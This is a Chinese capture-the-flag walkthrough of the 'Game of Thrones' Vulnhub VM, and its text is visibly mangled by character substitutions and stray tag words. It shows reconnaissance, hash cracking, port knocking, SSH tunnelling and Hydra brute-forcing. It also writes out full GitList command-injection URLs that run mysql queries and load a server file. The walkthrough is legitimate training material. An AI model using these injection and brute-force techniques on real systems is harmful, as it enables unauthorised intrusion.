靶机说明:php
Game of Thrones Hacking CTF
This is a challenge-game to measure your hacking skills. Set in Game of Thrones fantasy world.css
Goal:html
Get the 7 kingdom flags and the 4 extra content flags (3 secret flags + final battle flag). There are 11 in total.java
Rules/guidelines to play:python
- Start your conquer of the seven kingdoms
- You'll need hacking skills, no Game of Thrones knowledge is required. But if you play, it may contains spoilers of the TV series
- Difficulty of the CTF: Medium-High
- Don't forget to take your map (try to find it). It will guide you about the natural flag order to follow over the kingdoms
- Listen CAREFULLY to the hints. If you are stuck, read the hints again!
- Powerful fail2ban spells were cast everywhere. Bruteforce is not an option for this CTF (2 minutes ban penalty)
- The flags are 32 chars strings. Keep'em all! you'll need them
Requirements/starting guide:mysql
- Import the Linux based CTF challenge virtual machine (OVA file)
- OVA file is compatible with Oracle Virtualbox and Vmware
- The challenge vm needs 1 cpu and 1512mb RAM to work properly
- The challenge vm has its network configured by default as bridge. It will take an IP from the DHCP of your network
Downloading challenge CTF vm:linux
- Download Link 1 (Mega)
- Mirror 1 (Dropbox)
Troubleshootinggit
- Vmware:
- If you get a warning/error importing machine, press "Retry" and it will be imported flawlessly
- Oracle Virtualbox
- It's recommended to use "Import Appliance" menu option instead of double click on OVA file
- If you get an error regarding network, just select your network interface
Good luck, the old gods and the new will protect you!
_____ ___ _____ _ | __|___ _____ ___ ___| _| |_ _| |_ ___ ___ ___ ___ ___ | | | .'| | -_| | . | _| | | | | _| . | | -_|_ -| |_____|__,|_|_|_|___| |___|_| |_| |_|_|_| |___|_|_|___|___|
靶机渗透:github
本次采用parrot linux+windows10来做为攻击机,攻击机IP地址为:192.168.0.112web
靶机与攻击机在同一网段,咱们先用nmap扫描出靶机的IP地址:
由于我用VM打开靶机,因此发现靶机IP为:192.168.0.161
而后咱们使用nmap对这个IP进行深度扫描:
能够发现靶机开启了不少端口:21,22,53,80,143,3306,5432,10000
咱们尝试访问一下靶机主页面:
咱们先查看源代码:
...有一堆看起来很与价值的东西...通过百度翻译...shit..咱们接着看:
咱们尝试使用kali里面的dirb来对靶机目录进行爆破:
发现不少目录:
- http://192.168.0.161/css/
- http://192.168.0.161/favicon.ico
- http://192.168.0.161/imgs/
- http://192.168.0.161/index.php
- http://192.168.0.161/robots.txt
- http://192.168.0.161/sitemap.xml
还有比较奇怪的目录:
- http://192.168.0.161/h/i/d/d/e/n/index.php
咱们先查看一下比较敏感的 robots.txt :
里面有三个目录:/the-tree/,/secret-island/,/direct-access-to-kings-landing/,
还有个User-agent:Three-eyed-raven
咱们先依次访问那三个目录:
咱们点击Map:
咱们仔细研究一下这张地图:
上面记录了本次游戏的关键点和目标,除了常规须要获得7个flag以外,还有3个隐秘flag,
并且最后的战争是经过ssh...
咱们访问下一个目录:
咱们查看源代码,看是否有有用的信息:
有这样一句话:
You mUSt changE your own shape and foRm if you wAnt to GEt the right aNswer from the Three-eyed raven" - Written on the tree by somebody
翻译:你必须改变本身的形状和形式,若是你想从Three-eyed-raven那里获得正确答案的话--树上的某我的所写
看到这个Three-eyed-raven我忽然想到robots.txt里面的user-agent,提示也说须要改变本身,
会不会是要burp抓包,来替换header头的user-agent,咱们尝试:
内容以下:
<!--
"I will give you three hints, I can see the future so listen carefully" - The three-eyed raven Bran Stark
"To enter in Dorne you must identify as oberynmartell. You still should find the password"
"3487 64535 12345 . Remember these numbers, you'll need to use them with POLITE people you'll know when to use them"
"The savages never crossed the wall. So you must look for them before crossing it"
-->
翻译:
“我会给你三个暗示,我能够看到将来,因此仔细听”——The three-eyed raven Bran Stark
“为了进入Dorne,你必须把本身看成 oberynmartell。你将会找到密码
“3487 64535 12345。记住这些数字,你须要和有礼貌的人一块儿使用,你会知道何时使用它们。
“野人历来没有穿过墙。因此你必须在过马路前寻找它们。
...忽然没头绪了,这些提示之后作的时候估计就会用到,咱们访问第三个目录:
查看源代码:
内容以下:"I've heard the savages usually play music. They are not as wild as one can expect, are they?" - Sansa Stark
翻译:“我据说野蛮人常常演奏音乐。它们并不像人们想象的那么疯狂,是吗?”桑莎斯塔克
...忽然没头绪了,咱们爆破出了那么多目录,咱们访问几个比较敏感的:
Music?野兽都能懂?同时考虑一下三眼乌鸦的第一个指示,让咱们把音乐下载下来,用exiftool查看文件信息:
https://sno.phy.queensu.ca/~phil/exiftool/
能够看到:Savages secret flag: 8bf8854bebe108183caeb845c7676ae4
咱们获得第一个隐藏的flag!!! 咱们找一下其余网页
咱们忽然发现还有个 raven.php ,尝试访问:
还得查看源代码:
翻译:穿过墙壁,mcrypt的咒语将帮助你。无论你是谁,只有钥匙才能打开秘密之门
...咱们继续访问目录:
查看源代码:
内容以下:
<!--
"My little birds are everywhere. To enter in Dorne you must say: A_verySmallManCanCastAVeryLargeShad0w . Now, you owe me" - Lord (The Spider) Varys
"Powerful docker spells were cast over all kingdoms. We must be careful! You can't travel directly from one to another... usually. That's what the Lord of Light
has shown me" - The Red Woman Melisandre
-->
翻译:个人小鸟处处都是。要进入Dorne,你必须说:"A_verySmallManCanCastAVeryLargeShad0w . Now, you owe me"——“主(蜘蛛)瓦里斯”
“强大的码头法师被铸造在全部王国上。咱们必须当心!你不能直接从一个旅行到另外一个…一般状况下。这就是光之主向我展现的——“红女人梅丽桑德雷
咱们获得了一个密码:A_verySmallManCanCastAVeryLargeShad0w 而后根据这个能够进入Dorne,我想起来提示里面有
为了进入Dorne,你必须把本身看成 oberynmartell。你将会找到密码 这个 oberynmartell 就是用户名,同时地图上也有提示:
我感受咱们能够以oberynmartell的身份尝试登录ftp,密码是:
能够看到第一个flag已经出现,不过它看起来像md5加密,咱们尝试解密:
咱们在目录下发现两个文件:
咱们把它下载下来:
咱们点开第一个文件:problems_in_the_north.txt :
内容以下:
"There are problems in the north. We must travel quickly. Once there we must defend the wall" - Jon Snow
"What kind of magic is this?!? I never saw before this kind of papirus. Let's check it carefully" - Maester Aemon Targaryen
md5(md5($s).$p)
nobody:6000e084bf18c302eae4559d48cb520c$2hY68a
很明显要用上面的方法对下面的密码进行解密。
加密方式是:md5(md5($salt).$pass)
6000e084bf18c302eae4559d48cb520c$2hY68a
经过查阅资料(hashcat official wiki),这种加密方式只在hashcat-legacy 中支持。
同时发现,根据工具支持的格式,拿到的hash还须要把”$”改成”:”
6000e084bf18c302eae4559d48cb520c:2hY68a
把上述hash保存在pass.txt中
github中的地址为:https://github.com/hashcat/hashcat-legacy
可是能够看到,最新版的hashcat已经去掉了这种加密方式的破解,因此咱们还得找一个旧版本
https://hashcat.net/files_legacy/hashcat-2.00.7z
咱们寻找加密方式是:md5(md5($salt).$pass) 的编号:
结合咱们kali上自带的字典 rockyou.txt ,便可成功解出hash:
成功解密,获得密码为: stark
我i们同时获得的还有一个加密文件:the-wall.txt.nc 忽然想起另一个提示:
穿过墙壁,mcrypt的咒语将帮助你。无论你是谁,只有钥匙才能打开秘密之门
感受咱们可使用mcrypt来穿过墙壁,也就是解密,密码就是stark:
OK!解密成功:
内容以下:
"We defended the wall. Thanks for your help. Now you can go to recover Winterfell" - Jeor Mormont, Lord Commander of the Night's Watch
"I'll write on your map this route to get faster to Winterfell. Someday I'll be a great maester" - Samwell Tarly
http://winterfell.7kingdoms.ctf/------W1nt3rf3ll------
Enter using this user/pass combination:
User: jonsnow
Pass: Ha1lt0th3k1ng1nth3n0rth!!!
翻译:
“咱们守护了墙。谢谢你的帮助。如今你能够去寻找Winterfell-杰尔莫尔蒙,夜守望司令
“我会在你的地图上写下这条路线,以更快地到达临冬城。“有一天我会成为一个伟大的大师”——约翰·C·布莱德利
http://winterfell.7kingdoms.ctf/------W1nt3rf3ll------
使用此用户/ 密码进入:
用户:jonsnow
密码:Ha1lt0th3k1ng1nth3n0rth!!!
里面有个网址,咱们尝试直接访问:
咱们把这个网址添加到 /etc/hosts 中,并再次访问:
咱们使用上面找到的用户名和密码登陆,看到一个包含了两个图像的页面,是雪诺和北境旗标:
查看源代码,看是否有提示:
内容以下:
<!--
Welcome to Winterfell
You conquered the Kingdom of the North. This is your second kingdom flag!
639bae9ac6b3e1a84cebb7b403297b79
"We must do something here before travelling to Iron Islands, my lady" - Podrick Payne
"Yeah, I can feel the magic on that shield. Swords are no more use here" - Brienne Tarth
-->
翻译:
欢迎来到Winterfell
你征服了北方的王国。这是你的第二个flag!
639bae9ac6b3e1a84cebb7b403297b79
“在咱们去Iron Islands以前,咱们必须作点什么,个人夫人”——Podrick Payne
“是的,我能感受到那个盾牌的魔力。刀剑在这里再也不有用了——“- Brienne Tarth
咱们成功获得第二个flag!而且根据提示这个盾牌的盾徽是个突破口,咱们把这个图片下载下来:
用文本文件打开,在最后会出现这样一段话:
内容以下:
Timef0rconqu3rs TeXT should be asked to enter into the Iron Islands fortress" - Theon Greyjoy
翻译:
Timff0Run3Rs文本应被要求进入 Iron Islands fortress“- Theon Greyjoy
看来,下一步的关键点已经有了,结合地图上对第三个flag的提示:
第三个目标在DNS上,而上面的暗示指出TXT记录可能包含些什么,这时咱们可使用nslookup工具对dns记录进行查看。
nslookup最简单的用法是查询域名对应的IP地址,能够查询包括A记录、MX记录、NS记录、CNAME记录、TXT记录。
格式为:nslookup -q = txt 域名 IP
这样,咱们构造一个命令,查看一下靶机dns的txt记录,获得第三个flag:
内容以下:
Server: 192.168.0.161
Address: 192.168.0.161#53
Timef0rconqu3rs.7kingdoms.ctf text = "You conquered Iron Islands kingdom flag: 5e93de3efa544e85dcd6311732d28f95. Now you should go to Stormlands at http://stormlands.7kingdoms.ctf:10000 . Enter using this user/pass combination: aryastark/N3ddl3_1s_a_g00d_sword#!"
翻译:
服务器:192.1680.161
地址:192.1680.161×53
你征服了Iron Islands ,flag:5e93de3efa544e85dcd6311732d28f95。如今你应该去风暴地带:http://stormlands.7kingdoms.ctf:10000。
使用这个用户/密码通行:aryastark/N3ddl3_1s_a_g00d_sword#!
咱们获得第三个flag!
又是一个网址提示,咱们依然把它添加到 /etc/hosts 中,而且尝试访问10000端口:
使用用户密码登录,在主页面发现了这样的flag提示:
查看源代码也没有什么发现,咱们点击File Manager :
浏览器还得支持java...,建议到IE中操做...我就不操做了
参考:http://www.freebuf.com/articles/web/175048.html
另外一种方法:
根据地图中的提示发现:
stormlands接口是Webmin。
一旦链接,显示版本号:Webmin拼写版本:1.590
我搜索了一下,看看搜索字段中是否有任何缺陷没有结果。众所周知,该版本易受攻击(CVE-2012-2982),Metasploit提供了漏洞利用程序。
内容以下:
Congratulations!you conquered Stormlands.This is your flag:8fc42c6ddf9966db3b09e84365034357
Now prepare yourself for the next challenge!
The credntials to access to the Mountain and the Vale kingdom are:
user/pass: robinarryn/cr0wn_f0r_a_King-_
db: mountainandthevale
pgAdmin magic will notwork. Command line should be used on that kingdom - Talisa Maegyr
翻译:
祝贺你!你征服了暴风雨,这是你的flag: 8fc42c6ddf9966db3b09e84365034357
如今为下一个挑战作好准备吧!
通往Mountain and the Vale kingdom的证书是:
用户/密码:robinarryn/cr0wn_f0r_a_King-_
db:mountainandthevale
pgAdmin魔法不会起做用。命令行应该用于那个王国- Talisa Maegyr
咱们成功获得第四个flag!提示里面提到了用户名跟密码,还有一个db数据库名称
咱们看地图的提示:
..postgresql数据库,nmap扫描的时候就知道靶机在5432端口运行的是postgresql,
如今这个提示是要咱们访问数据库,使用上面找到的文件中提供的用户名密码链接,咱们尝试连接:
(postgresql经常使用命令:http://www.javashuo.com/article/p-oipzmkdb-hb.html)
咱们先查看表的结构:
发现有个flag表,咱们进入这个表,发现一大串base64加密:
咱们尝试解密:
内容以下:
Nice! you conquered the Kingdom of the Mountain and the Vale. This is your flag: bb3aec0fdcdbc2974890f805c585d432. Next stop the Kingdom of the Reach. You can identify yourself with this user/pass combination: olennatyrell@7kingdoms.ctf/H1gh.Gard3n.powah , but first you must be able to open the gates
翻译:
好极了!你征服了山脉和山谷的王国。这是flag:bb3aec0fdcdbc2974890f805c585d432。下一站,到达Kingdom。你能够用这个用户/ 密码组合来标识本身:olennatyrell@7kingdoms.ctf/H1gh.Gard3n.powah,但首先你必须可以打开大门。
咱们获得第五个flag! 咱们查看postgresql数据库其余有用的表:
select * from aryas_kill_list;
有不少名字,也许能用得上。
select * from eyrie;
select * from popular_wisdom_book;
select * from braavos_book;
内容以下:
1 | City of Braavos is a very particular place. It is not so far from here.
2 | "There is only one god, and his name is Death. And there is only one thing we say to Death: Not today" - Syrio Forel
3 | Braavos have a lot of curious buildings. The Iron Bank of Braavos, The House of Black and White, The Titan of Braavos, etc.
4 | "A man teaches a girl. -Valar Dohaeris- All men must serve. Faceless Men most of all" - Jaqen H'ghar
6 | "A girl has no name" - Arya Stark
7 | City of Braavos is ruled by the Sealord, an elected position.
8 | "That man's life was not yours to take. A girl stole from the Many-Faced God. Now a debt is owed" - Jaqen H'ghar
9 | Dro wkxi-pkmon qyn gkxdc iye dy mrkxqo iyeb pkmo. Ro gkxdc iye dy snoxdspi kc yxo yp iyeb usvv vscd. Covomd sd lkcon yx drsc lyyu'c vycd zkqo xewlob. Dro nkdklkco dy myxxomd gsvv lo lbkkfyc kxn iyeb zkccgybn gsvv lo: FkvkbWybqrevsc
这个第9个,好像不是英语,好像是rot16编码,咱们用https://www.rot13.com/尝试解码:
内容以下:
The many-faced god wants you to change your face. He wants you to identify as one of your kill list. Select it based on this book's lost page number. The database to connect will be braavos and your password will be: ValarMorghulis
翻译:
多面的神要你改变你的面貌。他想让你认出你的杀人名单。根据这本书丢失的页码选择它。链接的数据库将是braavos,您的密码将是:ValarMorghulis
我忽然想起来咱们的隐藏flag
如今咱们有数据库,有密码,咱们须要枚举一下用户名,发现TheRedWomanMelisandre是用户名
咱们来登录数据库:
咱们尝试寻找有用的信息:
select * from temple_of_the_faceless_men;
咱们成功获得隐藏的第二个flag: 3f82c41a70a8b0cfec9052252d9fd721
text: Congratulations. You've found the secret flag at City of Braavos. You've served well to the Many-Faced God.
根据第五个flag的提示,如今咱们该前往 king of the Reach ,咱们如今知道第六个flag的
用户名跟密码:olennatyrell@7kingdoms.ctf/H1gh.Gard3n.powah
咱们看地图有什么提示:
根据nmap的扫描结果,发现imap运行在143端口,可是这个端口没有开启,
前面有个提示:3487 64535 12345。记住这些数字,你须要和有礼貌的人一块儿使用,你会知道何时使用它们
而咱们在postgresql数据库的popular_wisdom_book中有这样的字眼:
好吧,须要敲门,这是一个安全机制,端口敲门服务(knockd),查下资料,看看这是啥。
这个该服务经过动态的添加iptables规则来隐藏系统开启的服务,使用自定义的一系列序列号来“敲门”。
经过这种方法使系统开启须要访问的服务端口,才能对外访问。
不使用时,再使用自定义的序列号来“关门”,将端口关闭,不对外监听。进一步提高了服务和系统的安全性。
端口试探(port knocking)是一种经过链接尝试,从外部打开原先关闭端口的方法。一旦收到正确顺序的链接尝试,防火墙就会动态打开一些特定的端口给容许尝试链接的主机。
端口试探的主要目的是防治攻击者经过端口扫描的方式对主机进行攻击。
端口试探相似于一次秘密握手协议,好比一种最基本的方式:发送必定序列的UDP、TCP数据包。当运行在主机上的daemon程序捕捉到数据包之后,若是这个序列正确,则开启相应的端口,或者防火墙容许客户端经过。
因为对外的Linux服务器经过限制IP地址的方式来控制访问,所以能够利用这种端口试探方式来进行防火墙对于访问IP地址的控制。
如今咱们使用以前在提示中找到的数字3487 64535 12345 ,试图让靶机打开143端口,使用knock来敲开端口:
咱们查看143端口是否开启:
使用netcat链接它,咱们使用前面找到的用户名和密码:
nc 192.168.0.161 143
获得的邮件内容以下:
Congratulations!!
You conquered the Kingdom of the Reach. This is the flag: aee750c2009723355e2ac57564f9c3db
Now you can auth on next Kingdom (The Rock, port 1337) using this user/pass combination:
User: TywinLannister
Pass: LannisterN3verDie!
“The things I do for love…” – Jaime (Kingslayer) Lannister
翻译:
祝贺你!!
你征服了Kingdom。这是flag:aee750c2009723355e2ac57564f9c3db
如今你能够在下一个Kingdom(The Rock,端口1337),使用这个用户/密码组合:
用户: TywinLannister
密码: LannisterN3verDie!
我为爱作的事……”雅伊姆(国王)兰尼斯特
咱们已经获得第六个flag!,而且在提示中获得登录1337端口的用户名跟密码,
咱们尝试登录:
登进来发现是一个gitlist网站,咱们随便浏览发现有提示:
内容以下:
There is a note under the bed. Somebody put it there. It says:
2f686f6d652f747972696f6e6c616e6e69737465722f636865636b706f696e742e747874
"The main gates of King's Landing are permanently closed by Queen's order. You must search for another entrance"
- An anonymous friend
翻译:
床底下有一张字条。有人把它放在那里。它说:
2f686f6d652f747972696f6e6c616e6e69737465722f636865636b706f696e742e747874
“国王着陆的主要大门是由奎因的命令永久关闭的。你必须寻找另外一个入口
匿名朋友
有一串十六进制的编码,咱们尝试解码:
/home/tyrionlannister/checkpoint.txt 看起来应该是一个有用的txt文档,可是得不到
Google一下发现gitlist存在一个命令执行漏洞,漏洞详情:
http://hatriot.github.io/blog/2014/06/29/gitlist-rce/
发现这个漏洞依然存在,太棒了!咱们尝试直接查看txt文件:
内容以下:
Welcome to: _____ _ _____ _ |_ _| |_ ___ | __ |___ ___| |_ | | | | -_| | -| . | _| '_| |_| |_|_|___| |__|__|___|___|_,_| You are very close to get the flag. Is not here, it's at King's Landing. We must travel there from here! The credentials to access to King's Landing are: user/pass: cerseilannister/_g0dsHaveNoMercy_ db: kingslanding "Chaos isn't a pit. Chaos is a ladder" - Petyr (Littlefinger) Baelish
反正咱们找到去往King's Landing的用户名跟密码: cerseilannister/_g0dsHaveNoMercy_ db: kingslanding
http://192.168.0.161:1337/casterly-rock/blob/master/"--" `mysql -h 192.168.0.161 -u "cerseilannister" -p"_g0dsHaveNoMercy_" -D kingslanding --execute="show tables;" `
http://192.168.0.161:1337/casterly-rock/blob/master/"--" `mysql -h 192.168.0.161 -u "cerseilannister" -p"_g0dsHaveNoMercy_" -D kingslanding --execute="SELECT * from iron_throne;" `
这个 -..-. . - -.-. -..-. -- -.-- ... --.- .-.. -..-. ..-. .-.. .- --. 明显是摩斯电码,在线解密一下:
有flag的踪迹了!
可是当咱们尝试去查看这个文件时却发现文件并不存在,这是怎么回事?
在摩斯密码的后面还有一点儿提示,告诉咱们在这里有特权,看看都有啥:
http://192.168.0.161:1337/casterly-rock/blob/master/"--" `mysql -h 192.168.0.161 -u "cerseilannister" -p"_g0dsHaveNoMercy_" -D kingslanding --execute="show grants;" `
能够看到有file、grant、select、insert、create,猜测,咱们有可能须要使用特权把flag的内容导入一个新的表中,这样咱们就能够查看了。
技术三联:
http://192.168.0.161:1337/casterly-rock/blob/master/"--" `mysql -h 192.168.0.161 -u "cerseilannister" -p"_g0dsHaveNoMercy_" -D kingslanding --execute="CREATE TABLE test (flag TEXT);" `
http://192.168.0.161:1337/casterly-rock/blob/master/"--" `mysql -h 192.168.0.161 -u "cerseilannister" -p"_g0dsHaveNoMercy_" -D kingslanding --execute="LOAD data INFILE '/etc/mysql/flag' INTO TABLE test;" `
http://192.168.0.161:1337/casterly-rock/blob/master/"--" `mysql -h 192.168.0.161 -u "cerseilannister" -p"_g0dsHaveNoMercy_" -D kingslanding --execute="select * from test;" `
内容以下:
Congratulations. You conquered the last kingdom flag. This is your flag: c8d46d341bea4fd5bff866a65ff8aea9 Now you must find the Dragonglass mine to forge stronger weapons. Ssh user-pass: daenerystargaryen-.Dracarys4thewin. "All men must die, but we are not men" - Daenerys Stormborn of the House Targaryen, First of Her Name, the Unburnt, Queen of the Andals and the First Men, Khaleesi of the Great Grass Sea, Breaker of Chains, and Mother of Dragons Congratulations. You conquered the last kingdom flag. This is your flag: c8d46d341bea4fd5bff866a65ff8aea9 Now you must find the Dragonglass mine to forge stronger weapons. Ssh user-pass: daenerystargaryen-.Dracarys4thewin. "All men must die, but we are not men" - Daenerys Stormborn of the House Targaryen, First of Her Name, the Unburnt, Queen of the Andals and the First Men, Khaleesi of the Great Grass Sea, Breaker of Chains, and Mother of Dragons
翻译:
祝贺你。你征服了最后的flag。这是你的flag:c8d46d341bea4fd5bff866a65ff8aea9 如今你必须找到Dragonglass矿,锻造更强的武器。SSH用户-密码:daenerystargaryen-.Dracarys4thewin.。全部的人都必须死去,但咱们不是男人。——Daenerys Stormborn的家塔尔贾扬,她的名字的第一个,未燃烧的,安达尔女王和第一个男人,伟大的草海的哈莱西,镣铐的破坏者,和龙之母的祝贺。
咱们成功获得第七个flag!不过提示告诉咱们还没结束,咱们须要登录SSH:
用户:daenerystargaryen
密码:.Dracarys4thewin.
登录成功!而且发现 /home/daenerystargaryen 目录下有两个文件夹:checkpoint.txt , digger.txt
咱们分别查看:
内容以下:
"Dragonglass. Frozen fire, in the tongue of old Valyria. Small wonder it is anathema to these cold children of the Other" - The Red Woman Melisandre
"Large amounts of Dragonglass can be found on Dragonglass mine (172.25.0.2). The mine can be accessed only from here. We are very close... Fail2ban magic is not present there, maybe we can reach the 'root' of the problem pivoting from outside to use this digger" - Samwell Tarly
"The White Walkers don't care if a man's free folk or crow. We're all the same to them, meat for their army. But together we can beat them" - Jon Snow
提示中说,这里是通往172.25.0.2的惟一入口,这有多是这里并无 fail2ban 的功能,这给了咱们暴力破解root权限的可能性,并且还存在digger.txt这个字典,用scp命令把这个文件下载到本地,用Hydra来进行暴破吧:
scp daenerystargaryen@192.168.0.161:/home/daenerystargaryen/digger.txt ./digger.txt
咱们使用本地隧道将其绑定到咱们的22222端口:
ssh daenerystargaryen@192.168.0.161 -L 12345:172.25.0.2:22 -N
如今我使用hydra经过ssh登陆,使用root做为用户名,并使用digger.txt文件来爆破密码:
爆破出root的密码是: Dr4g0nGl4ss!
咱们使用这个口令来经过ssh登陆,咱们使用localhost进行链接,由于咱们已经完成了ssh本地隧道的绑定:
咱们查看这个flag:
内容以下:
Congratulations.
You've found the secret flag of Dragonglass mine. This is your flag: a8db1d82db78ed452ba0882fb9554fc9
Now you have the Dragonglass weapons to fight against the White Walkers.
Host's ssh:
branstark/Th3_Thr33_Ey3d_Raven
"The time has come" - The Three Eyed Raven
咱们获得了第三个隐藏的flag!可这还不是结束,咱们又获得了HOST‘s ssh:
branstark/Th3_Thr33_Ey3d_Raven
咱们再次用ssh进行链接:
发现这个服务器是基于docker的,搜索一下发现:
https://www.exploit-db.com/exploits/40394/
docker存在一个本地提权漏洞,咱们用metersploit来链接:
咱们直接使用的是msf里面的docker本地提权脚本,如今咱们发现咱们已是root权限
咱们把/root目录下final_battle文件下载到本地,并打开:
发现里面有个flag.txt,不过须要密码才能解开,咱们查看checkpoint.txt看可否发现有用的信息:
内容以下:
To defeat White Walkers you need the help of the Savages, the Many-Faced God skill learned at Braavos and the Dragonglass weapons
Some hints:
type of file = ???
pass = ???
useful-pseudo-code-on-invented-language = concat(substr(secret_flag1, strlen(secret_flag1) - 10, strlen(secret_flag1)), substr(secret_flag2, strlen(secret_flag2) - 10, strlen(secret_flag2)), substr(secret_flag3, strlen(secret_flag3) - 10, strlen(secret_flag3)))
"Hodor... Hodor!!" - Hodor
虚拟语言的有用伪代码:
concat(substr(secret_flag1, strlen(secret_flag1) - 10, strlen(secret_flag1)), substr(secret_flag2, strlen(secret_flag2) - 10, strlen(secret_flag2)), substr(secret_flag3, strlen(secret_flag3) - 10, strlen(secret_flag3)))
须要用到三个secrect flag:
secrect flag1:8bf8854bebe108183caeb845c7676ae4
secrect flag2:3f82c41a70a8b0cfec9052252d9fd721
secrect flag3:a8db1d82db78ed452ba0882fb9554fc9
密码的公式是:
concat(
substr(secret_flag1, strlen(secret_flag1) - 10, strlen(secret_flag1)),
substr(secret_flag2, strlen(secret_flag2) - 10, strlen(secret_flag2)),
substr(secret_flag3, strlen(secret_flag3) - 10, strlen(secret_flag3))
)
简单用python写段代码,跑一下:
flag1="8bf8854bebe108183caeb845c7676ae4"
flag2="3f82c41a70a8b0cfec9052252d9fd721"
flag3="a8db1d82db78ed452ba0882fb9554fc9"
password=flag1[len(flag1)-10:len(flag1)]+flag2[len(flag2)-10:len(flag2)]+flag3[len(flag3)-10:len(flag3)]
print "password:" + password
咱们尝试运行:
能够获得密码为:45c7676ae4252d9fd7212fb9554fc9
咱们拿去解密final_battal文件:
咱们成功的获得了最后的flag!!!!
学习总结:
1.在音乐文件中隐藏flag,并用exiftool来分析音频文件,必定要细心。
2.解密的话可使用john the ripper,不过博主的john老是报john No password hashes loaded (see FAQ)错误
,参考https://www.waitalone.cn/john-no-password-hashes-loaded.html,仍是解决不了。。。
3.webmin的版本漏洞,如今有的网页是java语言,浏览器没有java插件可能致使代码不全。
4.postgresql数据库的基本操做语法
5.knock敲门,如今大可能是knockd(apt-get install knockd),也称端口试探。nc连接143 imap,来检查邮件传输
6.gitlist低版本的命令注入漏洞,能够本地复现。
7.使用本地隧道将其绑定端口。
8.docker低版本本地提权漏洞,以及msf的漏洞利用。
9.建议在vulnhub下载靶机镜像,本地练习,作完真的好累
参考资料:
http://www.freebuf.com/articles/web/177562.html